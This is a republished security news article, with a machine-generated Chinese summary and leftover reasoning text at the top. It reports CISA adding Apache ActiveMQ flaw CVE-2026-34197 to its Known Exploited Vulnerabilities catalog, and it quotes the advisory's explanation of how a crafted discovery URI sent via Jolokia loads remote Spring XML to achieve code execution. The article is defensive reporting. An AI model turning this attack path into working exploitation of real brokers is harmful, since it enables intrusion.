好的,用户让我用中文总结一篇文章,控制在100字以内,不需要特定的开头。首先,我需要通读文章内容,抓住主要信息。 文章讲的是美国CISA将Apache ActiveMQ的一个漏洞加入到已知被利用的漏洞目录中。这个漏洞是CVE-2026-34197,CVSS评分8.8,属于严重级别。漏洞原因是输入验证不当和不安全的代码执行,影响Jolokia JMX-HTTP桥接器。攻击者可以发送恶意请求,导致远程代码执行。 接下来,用户需要的是简洁的总结。我应该包括CISA、漏洞名称、影响范围、风险等级以及修复建议。确保在100字以内,同时保持信息完整。 最后,检查是否有遗漏的重要信息,比如截止日期和受影响版本。这样总结既全面又符合用户的要求。 </think> 美国网络安全与基础设施安全局(CISA)将Apache ActiveMQ中的一个严重漏洞(CVE-2026-34197)加入其已知被利用漏洞目录。该漏洞由输入验证不当和不安全代码执行引发,影响Jolokia JMX-HTTP桥接器,可导致远程代码执行。建议用户升级至5.19.4或6.2.3版本以修复问题。 2026-4-17 07:39:39 Author: securityaffairs.com(查看原文) 阅读量:31 收藏
U.S. CISA adds a flaw in Apache ActiveMQ to its Known Exploited Vulnerabilities catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a flaw in Apache ActiveMQ to its Known Exploited Vulnerabilities catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in Apache ActiveMQ, tracked as CVE-2026-34197 (CVSS score of 8.8), to its Known Exploited Vulnerabilities (KEV) catalog.
CVE-2026-34197 is a critical flaw in Apache ActiveMQ caused by improper input validation and unsafe code execution. It affects the Jolokia JMX-HTTP bridge exposed via the web console, which allows execution of certain management operations.
An authenticated attacker can send crafted requests with a malicious discovery URI that forces the broker to load a remote Spring XML configuration. Because Spring initializes beans before validation, attackers can execute arbitrary code, for example via Runtime.exec(). This results in remote code execution on the broker’s JVM.
“Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).” reads the advisory. “An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport’s brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring’s ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker’s JVM through bean factory methods such as Runtime.exec().”
The issue affects versions before 5.19.4 and 6.2.3, and users are strongly advised to upgrade.
According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.
Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.
CISA orders federal agencies to fix the vulnerability by April 30, 2026.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, US CISA Known Exploited Vulnerabilities catalog)
如有侵权请联系:admin#unsafe.sh